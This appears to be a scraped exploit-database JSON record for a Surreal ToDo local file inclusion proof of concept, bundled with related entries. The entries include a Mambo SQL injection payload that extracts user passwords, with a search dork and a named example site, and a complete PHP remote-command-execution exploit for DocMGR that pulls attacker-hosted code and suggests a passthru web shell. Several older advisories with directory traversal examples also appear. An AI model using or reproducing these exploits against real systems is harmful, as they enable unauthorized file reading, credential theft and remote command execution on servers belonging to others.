{"id": "1337DAY-ID-31603", "bulletinFamily": "exploit", "title": "Surreal ToDo 0.6.1.2 - Local File Inclusion Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2018-11-14T00:00:00", "modified": "2018-11-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/31603", "reporter": "Ihsan Sencan", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-11-19T19:12:00", "history": [], "edition": 1, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "469a28a102aa45d0b863d1a554a9ee8b"}, {"key": "modified", "hash": "9b8f1b8b431988936640ca43cc31c880"}, {"key": "published", "hash": "9b8f1b8b431988936640ca43cc31c880"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "8f9da6443571f75195f401f82e60b810"}, {"key": "sourceData", "hash": "8340c05472fc34999bf0328d1c6eb411"}, {"key": "sourceHref", "hash": "54c0a18c31fd9d387c97936edfb949f2"}, {"key": "title", "hash": "13b645b0cb592288ca9a094a06c14ba9"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "a95c00a3f1b6f9e2d3bf5e2c20e1af961f285909e23fa12bdc62102a57298b89", "viewCount": 253, "enchantments": {"score": {"value": 2.1, "vector": "NONE", "modified": "2018-11-19T19:12:00"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-1885", "1337DAY-ID-251"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:1885", "SECURITYVULNS:DOC:1885", "SECURITYVULNS:VULN:251", "SECURITYVULNS:DOC:251"]}], "modified": "2018-11-19T19:12:00"}, "vulnersScore": 2.1}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/31603", "sourceData": "# Exploit Title: Surreal ToDo 0.6.1.2 - Local File Inclusion\r\n# Exploit Author: Ihsan Sencan\r\n# Vendor Homepage: http://getsurreal.com/surrealtodo\r\n# Software Link: https://netcologne.dl.sourceforge.net/project/surrealtodo/Surreal%20ToDo/surrealtodo_v0.6.1.2.zip\r\n# Version: 0.6.1.2\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n \r\n# POC: \r\n# 1)\r\n# http://localhost/[PATH]/index.php?content=[FILE]\r\n# \r\nGET /[PATH]/index.php?content=../../../../Windows/win.ini HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Wed, 07 Nov 2018 23:58:36 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nContent-Length: 1885\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=UTF-8\n\n# 0day.today [2018-11-19] #"}

{"zdt": [{"lastseen": "2018-04-04T19:34:00", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-05-17T00:00:00", "published": "2007-05-17T00:00:00", "id": "1337DAY-ID-1885", "href": "https://0day.today/exploit/description/1885", "type": "zdt", "title": "Mambo com_yanc 1.4 beta (id) Remote SQL Injection Vulnerability", "sourceData": "===============================================================\r\nMambo com_yanc 1.4 beta (id) Remote SQL Injection Vulnerability\r\n===============================================================\r\n\r\n\r\n-------------------------------\r\n\r\nMambo com_yanc v1.4 beta (id) Blind Remote SQL Injection Vuln\r\n\r\n-------------------------------------------------------------\r\n\r\nExploit: index.php?option=com_yanc&Itemid=9999999&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*\r\n\r\nExample:http://www.tnrb.net/\r\n\r\n-------------------------------------------------------------\r\n\r\ngoogle dork: inurl:index.php?option=com_yanc\r\n\r\n\r\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/1885"}, {"lastseen": "2018-04-12T21:48:11", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2006-02-11T00:00:00", "published": "2006-02-11T00:00:00", "id": "1337DAY-ID-251", "href": "https://0day.today/exploit/description/251", "type": "zdt", "title": "DocMGR <= 0.54.2 (file_exists) Remote Commands Execution Exploit", "sourceData": "================================================================\r\nDocMGR <= 0.54.2 (file_exists) Remote Commands Execution Exploit\r\n================================================================\r\n\r\n\r\n\r\n\r\n\r\n<?php\r\n# ---docmgr_0542_incl_xpl.php 0.30 12/02/2006 #\r\n# #\r\n# DocMGR <= 0.54.2 remote commands execution exploit #\r\n# coded by rgod #\r\n# #\r\n# -> works against PHP5, with short_open_tag = On and register_globals = On #\r\n# usage: launch from Apache, fill in requested fields, then go! #\r\n# #\r\n# Sun-Tzu: \"The quality of decision is like the well-timed swoop of a falcon #\r\n# which enables it to strike and destroy its victim.\" #\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",0);\r\nob_implicit_flush (1);\r\n\r\necho'<html><head><title> ** DocMGR <= 0.54.2 remote commands execution exploit**\r\n</title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">\r\n<style type=\"text/css\"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:\r\n#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img\r\n{background-color: #FFFFFF !important} input {background-color: #303030\r\n!important} option { background-color: #303030 !important} textarea\r\n{background-color: #303030 !important} input {color: #1CB081 !important} option\r\n{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox\r\n{background-color: #303030 !important} select {font-weight: normal; color:\r\n#1CB081; background-color: #303030;} body {font-size: 8pt !important;\r\nbackground-color: #111111; body * {font-size: 8pt !important} h1 {font-size:\r\n0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em\r\n!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em\r\n!important} \th2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em\r\n!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:\r\nnormal !important} *{text-decoration: none !important} a:link,a:active,a:visited\r\n{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;\r\ncolor : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;\r\nfont-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;\r\nfont-weight:bold; font-style: italic;}--></style></head><body><p class=\"Stile6\">\r\n** DocMGR <= 0.54.2 remote commands execution exploit** </p><p class=\"Stile6\">a\r\nscript by rgod at <a href=\"http://retrogod.altervista.org\"target=\"_blank\">\r\nhttp://retrogod.altervista.org</a> </p> <table width=\"84%\"><tr><td width=\"43%\">\r\n<form name=\"form1\" method=\"post\" action=\"'.$_SERVER[PHP_SELF].'\"> <p><input\r\ntype=\"text\" name=\"host\"> <span class=\"Stile5\">* target (ex:www.sitename.com)\r\n</span></p> <p><input type=\"text\" name=\"path\"> <span class=\"Stile5\">* path (ex:\r\n/DocMgr/ or just / ) </span></p><p><input type=\"text\" name=\"cmd\"> <span\r\nclass=\"Stile5\"> * specify a command </span> </p> <p> <input type=\"text\"\r\nname=\"FTP_LOCATION\"><span class=\"Stile5\"> * specify an ftp location (ex: ftp://u\r\nsername:[email\u00a0protected])</span> </p> <p> <input type=\"text\" name=\"port\">\r\n<span class=\"Stile5\">specify a port other than 80 (default value)</span> </p>\r\n<p><input type=\"text\" name=\"proxy\"><span class=\"Stile5\"> send exploit through\r\nan HTTP proxy (ip:port) </span> </p> <p> <input type=\"submit\" name=\"Submit\"\r\nvalue=\"go!\"></p></form></td></tr></table></body></html>';\r\n\r\nfunction show($headeri)\r\n{\r\n $ii=0;$ji=0;$ki=0;$ci=0;\r\n echo '<table border=\"0\"><tr>';\r\n while ($ii <= strlen($headeri)-1){\r\n $datai=dechex(ord($headeri[$ii]));\r\n if ($ji==16) {\r\n $ji=0;\r\n $ci++;\r\n echo \"<td>&nbps;&nbps;</td>\";\r\n for ($li=0; $li<=15; $li++) {\r\n echo \"<td>\".htmlentities_($headeri[$li+$ki]).\"</td>\";\r\n\t\t}\r\n $ki=$ki+16;\r\n echo \"</tr><tr>\";\r\n }\r\n if (strlen($datai)==1) {\r\n echo \"<td>0\".htmlentities($datai).\"</td>\";\r\n }\r\n else {\r\n echo \"<td>\".htmlentities($datai).\"</td> \";\r\n }\r\n $ii++;$ji++;\r\n }\r\n for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {\r\n echo \"<td>&nbsp&nbsp</td>\";\r\n }\r\n for ($li=$ci*16; $li<=strlen($headeri); $li++) {\r\n echo \"<td>\".htmlentities($headeri[$li]).\"</td>\";\r\n }\r\n echo \"</tr></table>\";\r\n}\r\n\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\n\r\nfunction sendpacket() //2x speed\r\n{\r\n global $proxy, $host, $port, $packet, $html, $proxy_regex;\r\n $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\r\n if ($socket < 0) {\r\n echo \"socket_create() failed: reason: \" . socket_strerror($socket) . \"<br>\";\r\n }\r\n else {\r\n $c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {echo 'Not a valid prozy...';\r\n die;\r\n }\r\n echo \"OK.<br>\";\r\n echo \"Attempting to connect to \".$host.\" on port \".$port.\"...<br>\";\r\n if ($proxy=='') {\r\n $result = socket_connect($socket, $host, $port);\r\n }\r\n else {\r\n $parts =explode(':',$proxy);\r\n echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\r\n $result = socket_connect($socket, $parts[0],$parts[1]);\r\n }\r\n if ($result < 0) {\r\n echo \"socket_connect() failed.\\r\\nReason: (\".$result.\") \" . socket_strerror($result) . \"<br><br>\";\r\n }\r\n else {\r\n echo \"OK.<br><br>\";\r\n $html= '';\r\n socket_write($socket, $packet, strlen($packet));\r\n echo \"Reading response:<br>\";\r\n while ($out= socket_read($socket, 2048)) {$html.=$out;}\r\n echo nl2br(htmlentities($html));\r\n echo \"Closing socket...\";\r\n socket_close($socket);\r\n }\r\n }\r\n}\r\n\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.htmlentities($host); die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid prozy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);echo nl2br(htmlentities($html));\r\n}\r\n\r\n$host=$_POST[host];$path=$_POST[path];\r\n$port=$_POST[port];$FTP_LOCATION=urlencode($_POST[FTP_LOCATION]);\r\n$cmd=urlencode($_POST[cmd]);$proxy=$_POST[proxy];\r\necho \"<span class=\\\"Stile5\\\">\";\r\n\r\nif (($host<>'') and ($path<>'') and ($cmd<>'') and ($FTP_LOCATION<>''))\r\n{\r\n $port=intval(trim($port));\r\n if ($port=='') {$port=80;}\r\n if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\n if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n $host=str_replace(\"\\r\",\"\",$host);$host=str_replace(\"\\n\",\"\",$host);\r\n $path=str_replace(\"\\r\",\"\",$path);$path=str_replace(\"\\n\",\"\",$path);\r\n\r\n # STEP X -> One and unique, arbitrary remote inclusion ...\r\n $packet=\"GET \".$p.\"modules/center/admin/accounts/process.php?cmd=$cmd&includeModule=suntzu\";\r\n $packet.=\"&siteModInfo[suntzu][module_path]=$FTP_LOCATION/ HTTP/1.1\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"User-Agent: MiracleAlphaTest\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n show($packet);\r\n sendpacketii($packet);\r\n if (eregi(\"HiMaster!\",$html)) {echo \"Exploit succeeded...\";}\r\n\t\t\t else {echo \"Exploit failed...\";}\r\n}\r\nelse\r\n{echo \"Note: on ftp://somehost.com you need this code<br>\r\n in process.php or function.php :<br>\";\r\n echo nl2br(htmlentities(\"\r\n <?php\r\n echo\\\"HiMaster!\\\";ini_set(\\\"max_execution_time\\\",0);passthru(\\$cmd);\r\n ?>\r\n \")).\"<br>\";\r\n echo \"Fill * required fields, optionally specify a proxy...\";}\r\necho \"</span>\";\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/251"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:16", "bulletinFamily": "software", "description": "Server can crash on malformed sompresses DNS reply.", "modified": "2002-03-26T00:00:00", "published": "2002-03-26T00:00:00", "id": "SECURITYVULNS:VULN:1885", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:1885", "title": "squid DNS DoS", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:04", "bulletinFamily": "software", "description": "Interrorem security announcement\r\nInterrorem - protecting business\r\n\r\nSoftware vulnerable: Snapstream PVS\r\nVendor website: http://www.snapstream.com\r\nWorkaround: Stop the snapstream server\r\n\r\nSoftware synopsis:\r\nSnapstream PVS is a Personal Video System for Windows Systems. It allows users to\r\nschedule recordings on their PC and to view them later at the leisure, at their\r\nlocal machine or across a TCP/IP network via an HTTP interface.\r\n\r\nTypically, the Snapstream HTTP interface runs on TCP port 8129.\r\n\r\nProblem description:\r\n\r\nIssue 1: Directory traversal bug\r\n\r\nIt is possible to navigate outside of the HTTP base directory, and download any\r\nfile from the host for which the filename is known. The HTTP server runs in the\r\ncontext of the logged in user.\r\n\r\nExamples:\r\n\r\nhttp://home.victim.com:8080/../../../../autoexec.bat\r\n\r\nhttp://home.victim.com:8080/../../../winnt/repair/sam\r\n\r\nRisk: High. Any files on the target system are available to an attacker.\r\n\r\n\r\nIssue 2: SSD.ini, which contains a great deal of information regarding the target\r\nsystem can be retrieved remotely using the method detailed above.\r\n\r\nExample:\r\n\r\nhttp://home.victim.com:8080/../ssd.ini\r\n\r\nRisk: High. Information included in the ini file includes base directory\r\nlocation, usernames, and passwords.\r\n\r\n\r\nIssue 3: Passwords are stored as plaintext in SSD.INI\r\n\r\nPasswords to the SnapStream PVS software are recoverable remotely using the method\r\ndetailed in Issue 2.\r\n\r\nRisk: High. Denial of service, destruction of data, exposure of passwords.\r\n\r\n\r\nFor more information on this, and other security issues, please visit:\r\n\r\nhttp://www.interrorem.com\r\n\r\nInterrorem - protecting business\r\n\r\nNetwork Security Specialists\r\nSecurity News and Information\r\nFree Security Software\r\nOSSTMM.ORG supporters", "modified": "2001-07-27T00:00:00", "published": "2001-07-27T00:00:00", "id": "SECURITYVULNS:DOC:1885", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:1885", "title": "Snapstream PVS vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:15", "bulletinFamily": "software", "description": "\u041d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u0430\u044f \u0440\u0430\u0431\u043e\u0442\u0430 \u0441 \u0444\u0430\u0439\u043b\u0430\u043c\u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043a\u0430\u043a root", "modified": "2000-06-08T00:00:00", "published": "2000-06-08T00:00:00", "id": "SECURITYVULNS:VULN:251", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:251", "title": "\u0414\u044b\u0440\u043a\u0430 \u0432 apsfilter", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n_____________________________________________________________________\r\n\r\n Network Associates, Inc.\r\n COVERT Labs Security Advisory\r\n May 25, 2000\r\n\r\n Microsoft Windows Computer Browser Reset\r\n\r\n COVERT-2000-05\r\n______________________________________________________________________\r\n\r\no Synopsis\r\n\r\nThe Microsoft Windows implementation of the Browser Protocol contains\r\nan undocumented feature that provides for the remote shutdown of the\r\nComputer Browser Service on a single computer or multiple computers.\r\n\r\nRISK FACTOR: MEDIUM\r\n______________________________________________________________________\r\n\r\no Vulnerable Systems\r\n\r\nAll versions of Microsoft Windows 95, 98, NT and 2000.\r\n\r\n______________________________________________________________________\r\n\r\no Vulnerability Information\r\n\r\nThe publicly available CIFS Browser Protocol specification defines\r\na set of browse frames delivered on the network over UDP port 138.\r\nOne specific frame, however, remains undocumented: the\r\n&quot;ResetBrowser&quot;.\r\nThis browser frame is decoded by Microsoft&#39;s Network Monitor, and\r\ngenerated by the resource kit utility &quot;browstat.exe&quot; using the\r\ntickle option. Other CIFS implementations such as SAMBA also contain\r\nreferences to the ResetBrowser frame.\r\n\r\nWhile the entire CIFS Browser Protocol is unauthenticated allowing\r\nmany avenues of attack, the ResetBrowser frame presents a unique\r\nopportunity. Creation of the browse frame allows three options:\r\n\r\no stop the browser from being a master\r\no reset the entire browser state\r\no shut down the browser\r\n\r\nThe ResetBrowser has the potential to either shut down the Computer\r\nBrowser on a Windows host or to reset its state. This can provide\r\nan opportunity for a denial of service attack or allow an attacker to\r\nselectively shut down a specific browser &#40;or a number of browsers&#41;\r\nas part of a larger attack on the name and service resolution\r\nsystems of a Windows domain.\r\n\r\nAdding to the denial of service implications, the continual delivery\r\nof this browse frame to a domain&#39;s NetBIOS name will reset the\r\nComputer Browser Service on all hosts in the domain within broadcast\r\nrange. Accessing information from the Browse List through such\r\nutilities as Network Neighborhood can be restricted if not denied\r\nfor a large number of hosts in an efficient manner.\r\n\r\nThe unauthenticated CIFS Browsing Protocol is UDP based, ensuring\r\nthat the ResetBrowser frame can be easily spoofed across routers.\r\n\r\n______________________________________________________________________\r\n\r\no Resolution\r\n\r\nMicrosoft has released a patch for this vulnerability. The patch can\r\nbe found at:\r\n\r\nWindows NT 4.0 Workstation, Server, and Server, Enterprise Edition:\r\n\r\nhttp://www.microsoft.com/Downloads/Release.asp?ReleaseID=21397\r\n\r\nWindows 2000\r\n\r\nhttp://www.microsoft.com/Downloads/Release.asp?ReleaseID=21298\r\n\r\nFor more information, their security bulletin can be found at:\r\n\r\nhttp://www.microsoft.com/technet/security/bulletin/ms00-036.asp\r\n\r\n______________________________________________________________________\r\n\r\no Credits\r\n\r\nThe discovery and documentation of this vulnerability was conducted\r\nby Anthony Osborne at the COVERT Labs of PGP Security, Inc.\r\n\r\n______________________________________________________________________\r\n\r\no Contact Information\r\n\r\nFor more information about the COVERT Labs at PGP Security, visit our\r\nwebsite at http://www.nai.com/covert or send e-mail to covert@nai.com\r\n\r\n______________________________________________________________________\r\n\r\no Legal Notice\r\n\r\nThe information contained within this advisory is Copyright &#40;C&#41; 2000\r\nNetworks Associates Technology Inc. It may be redistributed provided\r\nthat no fee is charged for distribution and that the advisory is not\r\nmodified in any way.\r\n\r\nNetwork Associates and PGP are registered Trademarks of Network\r\nAssociates, Inc. and/or its affiliated companies in the United States\r\nand/or other Countries. All other registered and unregistered\r\ntrademarks in this document are the sole property of their respective\r\nowners.\r\n\r\n______________________________________________________________________\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 6.5.1\r\nComment: Crypto Provided by Network Associates &lt;http://www.nai.com&gt;\r\n\r\niQA/AwUBOS3fiqF4LLqP1YESEQIk3wCfVw6wxz8vxvwjOKQYtXbFeNVEuWoAn2Fe\r\nEsv6v8cITqltefFbuO+r7p2G\r\n=3hyj\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2000-05-26T00:00:00", "published": "2000-05-26T00:00:00", "id": "SECURITYVULNS:DOC:251", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:251", "title": "[COVERT-2000-05] Microsoft Windows Computer Browser Reset Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}